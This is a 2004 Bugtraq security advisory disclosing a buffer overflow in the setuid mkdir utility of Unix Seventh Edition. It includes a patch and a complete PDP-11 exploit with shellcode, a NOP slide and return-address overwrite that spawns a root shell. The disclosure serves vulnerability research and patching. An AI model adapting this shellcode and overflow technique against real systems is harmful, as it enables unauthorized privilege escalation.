[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSI.4.58.0406021729590.23446@malasada.lava.net>
Date: Wed, 2 Jun 2004 17:30:50 -1000 (HST)
From: Tim Newsham <newsham@...a.net>
To: bugtraq@...urityfocus.com
Subject: Mkdir buffer overflow vulnerability in Unix Seventh Edition.
Mkdir buffer overflow vulnerability in Unix Seventh Edition.
2 Jun 2004
SYNOPSIS
A vulnerability in the mkdir system utility can allow an
unprivileged user to gain root privileges in UNIX 7th
Edition systems.
DESCRIPTION
The mkdir utility (/bin/mkdir) creates directories on behalf
of the user. Mkdir is granted root privileges through the
set-user-id mechanism to allow it to create directories with
the mknod system call. Before making a subdirectory, mkdir first
verifies that the path leading up to the new directory exists
and that the user can access the directory. In the process
of performing these tests, mkdir copies a portion of the
user supplied path into a fixed sized temporary buffer.
This occurs in the function mkdir() (see /usr/src/cmd/mkdir.c).
The mkdir() function first finds the position of the last path
divider character ('/') in the provided path, and then copies
all the data up to this point into the pname buffer. Since
the pname buffer is only 128 bytes long, and the user provided
path can have a much longer length, a buffer overflow condition
exists.
SOLUTION
The fix to this problem is simple -- ensure that the provided
path is no longer than the maximum path length. This can be
done by adding:
if(strlen(d) >= 126) {
fprintf(stderr, "mkdir: path is too long\n");
++Errors;
return;
}
to the start of the mkdir() function. Comparing with a value
slightly less than the maximum path length ensures that the
buffer is also large enough to contain the path to the "."
link that is created later in the function.
EXPLOIT
The following program exploits this problem on the PDP-11
platform to run a shell with the effective user id of the
superuser.
----
/*
* Exploit for /bin/mkdir Unix V7 PDP-11.
* mkdir has a buffer overflow when checking if the directory
* in /arg/with/slashes/fname exists.
*
* This will run /bin/sh with euid 0, but not uid 0. Since
* the shell doesn't do anything special about this, we don't
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
*/
/*
.globl _main
_main:
mov pc,r1
sub $-[sh-_main-2], r1 / pointer to sh
mov r1, r2
sub $-8, r2
clrb -1(r2) / null terminate
mov r1, r2
clr -(r1) / char *env[] = {0}
mov r1, r3
mov r2, -(r1) / char *argv[] = {sh, 0}
mov r1, r4
mov r3, -(r1) / reverse of sh,argv,env
mov r4, -(r1)
mov r2, -(r1)
sys 59.; 11111; 11111; 11111 / call execve
argv: 11111; 11111
sh: </bin/sh>
*/
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };
#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0
main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];
/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);
/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';
/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;
/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;
argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
}
Powered by blists - more mailing lists